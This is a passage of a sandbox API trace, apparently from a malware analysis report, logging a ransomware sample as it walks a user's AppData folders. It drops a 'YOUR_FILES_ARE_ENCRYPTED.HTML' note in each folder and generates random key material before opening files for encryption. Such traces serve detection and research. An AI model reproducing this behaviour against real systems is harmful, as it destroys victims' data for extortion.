returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Media\\*" [0163.846] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Media\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x86d0cb6d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0163.847] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x86d0cb6d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0163.847] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd249af30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x892d68f3, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="12.0", cAlternateFileName="")) returned 1 [0163.847] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Media\\12.0") returned 66 [0163.847] GetProcessHeap () returned 0x270000 [0163.847] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0163.847] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Media\\12.0" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Media\\12.0") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Media\\12.0" [0163.847] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Media\\12.0", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\*" [0163.847] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd249af30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x892d68f3, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0163.848] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd249af30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x892d68f3, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0163.848] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd249af30, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd249af30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x86d0cb6d, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x1f2, dwReserved0=0x0, dwReserved1=0x60, cFileName="WMSDKNS.DTD", cAlternateFileName="")) returned 1 [0163.848] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.DTD") returned 78 [0163.848] lstrcmpW (lpString1="WMSDKNS.DTD", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.848] PathFindExtensionW (pszPath="WMSDKNS.DTD") returned=".DTD" [0163.848] lstrlenW (lpString=".DTD") returned 4 [0163.848] PathFindExtensionW (pszPath="WMSDKNS.DTD") returned=".DTD" [0163.848] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd249af30, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd249af30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8928a632, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x27cf, dwReserved0=0x0, dwReserved1=0x60, cFileName="WMSDKNS.XML", cAlternateFileName="")) returned 1 [0163.848] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\WMSDKNS.XML") returned 78 [0163.848] lstrcmpW (lpString1="WMSDKNS.XML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0163.848] PathFindExtensionW (pszPath="WMSDKNS.XML") returned=".XML" [0163.848] lstrlenW (lpString=".XML") returned 4 [0163.848] PathFindExtensionW (pszPath="WMSDKNS.XML") returned=".XML" [0163.848] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd249af30, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd249af30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8928a632, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x27cf, dwReserved0=0x0, dwReserved1=0x60, cFileName="WMSDKNS.XML", cAlternateFileName="")) returned 0 [0163.848] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0163.849] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 96 [0163.849] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Media\\12.0\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows media\\12.0\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0163.849] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0163.852] CloseHandle (hObject=0x58c) returned 1 [0163.852] GetProcessHeap () returned 0x270000 [0163.853] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0163.853] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd249af30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x892d68f3, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="12.0", cAlternateFileName="")) returned 0 [0163.853] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0163.853] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Media\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 91 [0163.853] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Media\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows media\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0163.854] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0163.856] CloseHandle (hObject=0x4a8) returned 1 [0163.856] GetProcessHeap () returned 0x270000 [0163.857] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0163.857] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd249af30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8c2982ab, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="Windows Sidebar", cAlternateFileName="WINDOW~1")) returned 1 [0163.857] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Sidebar") returned 63 [0163.857] GetProcessHeap () returned 0x270000 [0163.857] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x75f0050 [0163.857] lstrcpyW (in: lpString1=0x75f0050, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Sidebar" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Sidebar") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Sidebar" [0163.857] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Sidebar", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Sidebar\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Sidebar\\*" [0163.857] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Sidebar\\*", lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd249af30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8c2982ab, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3200 [0163.858] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd249af30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8c2982ab, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0163.858] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8c2982ab, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Gadgets", cAlternateFileName="")) returned 1 [0163.858] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets") returned 71 [0163.858] GetProcessHeap () returned 0x270000 [0163.858] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0163.858] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets" [0163.858] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\*" [0163.858] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\*", lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8c2982ab, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f3240 [0163.859] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8c2982ab, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0163.859] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd23b66f0, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8c2982ab, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 0 [0163.859] FindClose (in: hFindFile=0x42f3240 | out: hFindFile=0x42f3240) returned 1 [0163.859] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 101 [0163.859] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Sidebar\\Gadgets\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows sidebar\\gadgets\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x58c [0163.859] WriteFile (in: hFile=0x58c, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd4fc, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd4fc*=0x3c00, lpOverlapped=0x0) returned 1 [0163.861] CloseHandle (hObject=0x58c) returned 1 [0163.999] GetProcessHeap () returned 0x270000 [0164.012] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74c2008 | out: hHeap=0x270000) returned 1 [0164.018] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd249af30, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd249af30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8c2982ab, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x54, dwReserved0=0x0, dwReserved1=0x60, cFileName="Settings.ini", cAlternateFileName="")) returned 1 [0164.018] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Sidebar\\Settings.ini") returned 76 [0164.018] lstrcmpW (lpString1="Settings.ini", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.018] PathFindExtensionW (pszPath="Settings.ini") returned=".ini" [0164.018] lstrlenW (lpString=".ini") returned 4 [0164.018] PathFindExtensionW (pszPath="Settings.ini") returned=".ini" [0164.018] FindNextFileW (in: hFindFile=0x42f3200, lpFindFileData=0x4ebd53c | out: lpFindFileData=0x4ebd53c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd249af30, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd249af30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8c2982ab, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x54, dwReserved0=0x0, dwReserved1=0x60, cFileName="Settings.ini", cAlternateFileName="")) returned 0 [0164.018] FindClose (in: hFindFile=0x42f3200 | out: hFindFile=0x42f3200) returned 1 [0164.019] wnsprintfW (in: pszDest=0x75f0050, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Sidebar\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 93 [0164.019] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\Windows Sidebar\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\windows sidebar\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4a8 [0164.020] WriteFile (in: hFile=0x4a8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd808, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd808*=0x3c00, lpOverlapped=0x0) returned 1 [0164.022] CloseHandle (hObject=0x4a8) returned 1 [0164.022] GetProcessHeap () returned 0x270000 [0164.023] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x75f0050 | out: hHeap=0x270000) returned 1 [0164.024] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xd249af30, ftLastAccessTime.dwHighDateTime=0x1d70517, ftLastWriteTime.dwLowDateTime=0x8c2982ab, ftLastWriteTime.dwHighDateTime=0x1cb88f5, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="Windows Sidebar", cAlternateFileName="WINDOW~1")) returned 0 [0164.024] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0164.024] wnsprintfW (in: pszDest=0x74081a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 77 [0164.024] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x598 [0164.025] WriteFile (in: hFile=0x598, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebdb14, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebdb14*=0x3c00, lpOverlapped=0x0) returned 1 [0164.027] CloseHandle (hObject=0x598) returned 1 [0164.027] GetProcessHeap () returned 0x270000 [0164.028] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74081a0 | out: hHeap=0x270000) returned 1 [0164.036] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xab15a560, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xab15a560, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Temp", cAlternateFileName="")) returned 1 [0164.036] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp") returned 42 [0164.036] GetProcessHeap () returned 0x270000 [0164.036] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74c2008 [0164.038] lstrcpyW (in: lpString1=0x74c2008, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp" [0164.038] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\*" [0164.038] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xab15a560, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xaccba260, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0164.038] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd23b66f0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xab15a560, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xaccba260, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="..", cAlternateFileName="")) returned 1 [0164.038] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd2e6860, ftCreationTime.dwHighDateTime=0x1d7dcdc, ftLastAccessTime.dwLowDateTime=0x1ea39e0, ftLastAccessTime.dwHighDateTime=0x1d7e072, ftLastWriteTime.dwLowDateTime=0x1ea39e0, ftLastWriteTime.dwHighDateTime=0x1d7e072, nFileSizeHigh=0x0, nFileSizeLow=0x77b5, dwReserved0=0xffe64ae6, dwReserved1=0xffffffff, cFileName="-vIVzxE.gif", cAlternateFileName="")) returned 1 [0164.038] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\-vIVzxE.gif") returned 54 [0164.038] lstrcmpW (lpString1="-vIVzxE.gif", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.038] PathFindExtensionW (pszPath="-vIVzxE.gif") returned=".gif" [0164.038] lstrlenW (lpString=".gif") returned 4 [0164.038] PathFindExtensionW (pszPath="-vIVzxE.gif") returned=".gif" [0164.038] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0164.039] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Temp\\-vIVzxE.gif" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\temp\\-vivzxe.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x4a8 [0164.041] GetFileSizeEx (in: hFile=0x4a8, lpFileSize=0x4ebd810 | out: lpFileSize=0x4ebd810*=30645) returned 1 [0164.041] GetProcessHeap () returned 